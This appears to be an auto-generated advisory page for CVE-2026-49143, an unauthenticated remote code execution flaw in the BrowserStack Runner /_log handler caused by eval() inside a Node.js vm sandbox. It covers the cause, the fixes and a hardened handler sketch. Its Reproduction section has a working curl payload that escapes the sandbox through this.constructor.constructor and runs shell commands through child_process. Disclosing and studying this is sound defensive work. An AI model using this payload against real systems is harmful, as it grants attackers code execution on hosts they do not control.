VYPR
High severity 8.8 · NVD Advisory · Published Jun 2, 2026

CVE-2026-49143

Description

BrowserStack Runner through 0.9.5 contains a remote code execution vulnerability in the /_log HTTP handler that allows unauthenticated network-adjacent attackers to execute arbitrary code by submitting crafted JSON request bodies to the handler, which passes user-supplied data to vm.runInNewContext() combined with eval(). Attackers can escape the Node.js vm sandbox by leveraging a host-context Function reference through util.format to access the host process via this.constructor.constructor, achieving full remote code execution on the underlying system without any authentication.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The _log HTTP handler passes unauthenticated user-supplied data to vm.runInNewContext() combined with eval(), enabling a sandbox escape."

Attack vector

An unauthenticated, network-adjacent attacker can send a crafted JSON request body to the /_log HTTP handler. This handler processes the input using `vm.runInNewContext()` and `eval()`. By leveraging a host-context `Function` reference through `util.format`, an attacker can escape the Node.js vm sandbox via `this.constructor.constructor` to achieve arbitrary code execution on the host system [ref_id=1].

Affected code

The vulnerability resides in the HTTP handler `/_log` in `lib/server.js` (lines 491–515). Specifically, the code passes user-supplied data to `vm.runInNewContext()` and `eval()` within the `context` object, which includes a reference to `util.format` [ref_id=1].

What the fix does

The advisory recommends removing `eval()` and `vm.runInNewContext()` from the `_log` handler and using `JSON.stringify()` for safe logging instead. Additionally, it suggests adding UUID authentication to the `_log` handler, similar to the `_progress` and `_report` handlers, and binding the HTTP server to `127.0.0.1` instead of `0.0.0.0` to mitigate the vulnerability [ref_id=1].
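A sketch of a `/_log` handler with those three recommendations applied, added here as an example; it is not BrowserStack Runner's code and not a patch from the project. The `x-worker-uuid` header name, the `runUuid` parameter, the function names and the 64 KiB body cap are assumptions.

```javascript
'use strict';
// Added example: hardened /_log handling. Not BrowserStack Runner's own code.
const http = require('http');
const crypto = require('crypto');

const MAX_BODY = 64 * 1024; // assumed cap on the size of a log request body

// Constant-time check of the per-run UUID; an empty expected value never matches.
function uuidMatches(supplied, expected) {
  const a = Buffer.from(String(supplied || ''));
  const b = Buffer.from(String(expected || ''));
  return b.length > 0 && a.length === b.length && crypto.timingSafeEqual(a, b);
}

// Build the log line from the body. Nothing is evaluated: each argument is
// serialized with JSON.stringify, which also escapes embedded newlines.
function renderLogLine(rawBody) {
  let parsed;
  try { parsed = JSON.parse(rawBody); } catch (err) { return null; }
  if (parsed === null || !Array.isArray(parsed.arguments)) return null;
  return parsed.arguments.map((arg) => JSON.stringify(arg)).join(' ');
}

// Decide the response for one request. 'x-worker-uuid' is an assumed header name.
function handleLog(headers, rawBody, runUuid) {
  if (!uuidMatches(headers['x-worker-uuid'], runUuid)) return { status: 403, line: null };
  const line = renderLogLine(rawBody);
  return line === null ? { status: 400, line: null } : { status: 200, line };
}

// Wire the handler into an HTTP server; sink receives each accepted log line.
function createLogServer(runUuid, sink) {
  return http.createServer((req, res) => {
    if (req.method !== 'POST' || req.url !== '/_log') { res.writeHead(404); res.end(); return; }
    let body = '';
    req.on('data', (chunk) => {
      body += chunk;
      if (body.length > MAX_BODY) req.destroy(); // drop oversized bodies
    });
    req.on('end', () => {
      const result = handleLog(req.headers, body, runUuid);
      if (result.line !== null) sink(result.line);
      res.writeHead(result.status);
      res.end();
    });
  });
}

// Loopback only, instead of 0.0.0.0:
//   createLogServer(crypto.randomUUID(), console.log).listen(8888, '127.0.0.1');
```

With this shape, a string argument such as `1+1` is logged as the quoted text `"1+1"` rather than being executed, and a request without the matching UUID is rejected before its body is parsed.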

Preconditions

  • network: Attacker must be on the same network as the vulnerable instance.
  • auth: No authentication is required to exploit the vulnerability.
  • input: The attacker must submit a crafted JSON request body to the /_log endpoint.

Reproduction

```
# Terminal 1: start the runner
echo '<html><body>t</body></html>' > t.html
echo '{"username":"X","key":"X","test_path":"t.html","test_framework":"qunit","browsers":[]}' > browserstack.json
node bin/runner.js

# Terminal 2: exploit
curl -s http://127.0.0.1:8888/_log \
  -H "Content-Type: application/json" \
  -d '{"arguments":["this.constructor.constructor(\"return process.mainModule.require(\\`child_process\\\`).execSync(\\`id\\\`).toString()\")()"]}'

# Terminal 1 output shows:
# [undefined] uid=1000(user) gid=1000(user) ...
```

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2
